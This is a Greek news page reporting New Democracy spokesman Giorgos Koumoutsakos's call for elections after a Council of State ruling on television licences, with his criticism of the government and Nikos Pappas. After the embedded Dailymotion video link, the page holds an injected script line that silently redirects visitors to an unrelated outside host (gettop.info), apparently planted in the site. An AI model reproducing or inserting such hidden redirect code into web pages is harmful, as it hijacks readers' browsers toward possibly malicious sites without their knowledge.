Κουμουτσάκος: Yπάρχει ανάγκη εκλογών στη χώρα – Η κυβέρνηση έχει υποστεί δεινή πολιτική ήττα (BINTEO)

0
9

 

«Τα γεγονότα καταλυτικά. Μετά τις χθεσινές εξελίξεις τίποτα δεν είναι το ίδιο», τόνισε μιλώντας στον ΑΝΤ1 ο εκπρόσωπος Τύπου της ΝΔ.

Ο Γιώργος Κουμουτσάκος, έκανε λόγο για «απομόνωση του Νίκου Παππά, μετά τη χθεσινή απόφαση του ΣτΕ, για μια πολιτική που είχε κάνει εμβληματική η κυβέρνηση» και τόνισε ότι «η κυβέρνηση έχει υποστεί δεινή πολιτική ήττα και έχει μπει σε ένα δρόμο φθοράς», καταλήγοντας ότι «υπάρχει ανάγκη εκλογών στην χώρα».

Ο κ. Κουμουτσάκος χαρακτήρισε ως «βαθιά αντιδημοκρατική και αντιθεσμική την αντίδραση της κυβέρνησης στην απόφαση του Στε, τέτοια που της δίνει “λογική ολοκληρωτισμού”», καθώς όπως συμπλήρωσε «δεν υπάρχει Κυβέρνηση που να έχει ισχυριστεί ότι το Ανώτατο Δικαστήριο είναι υπό την επίδραση συμφερόντων».

Όπως είπε ο Γιώργος Κουμουτσάκος, «σε ότι αφορά την ανάγκη ρύθμιση του τηλεοπτικού τοπίου, διότι βρισκόμαστε στο σημείο «μηδέν», ασχέτως τι λέει η Κυβέρνηση, τις επόμενες ημέρες η ΝΔ θα παρουσιάσει , όπως έχει προαναγγείλει, πρόταση για το πώς μπορεί να υπάρξει ρύθμιση, πάνω σε βάσεις δημοκρατικές και συνταγματικές».

http://www.dailymotion.com/video/x4zaymv_%CE%BA%CE%BF%CF%85%CE%BC%CE%BF%CF%85%CF%84%CF%83%CE%AC%CE%BA%CE%BF%CF%82-%CF%85%CF%80%CE%AC%CF%81%CF%87%CE%B5%CE%B9-%CE%B1%CE%BD%CE%AC%CE%B3%CE%BA%CE%B7-%CE%B5%CE%BA%CE%BB%CE%BF%CE%B3%CF%8E%CE%BD-%CF%83%CF%84%CE%B7-%CF%87%CF%8E%CF%81%CE%B1_news setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here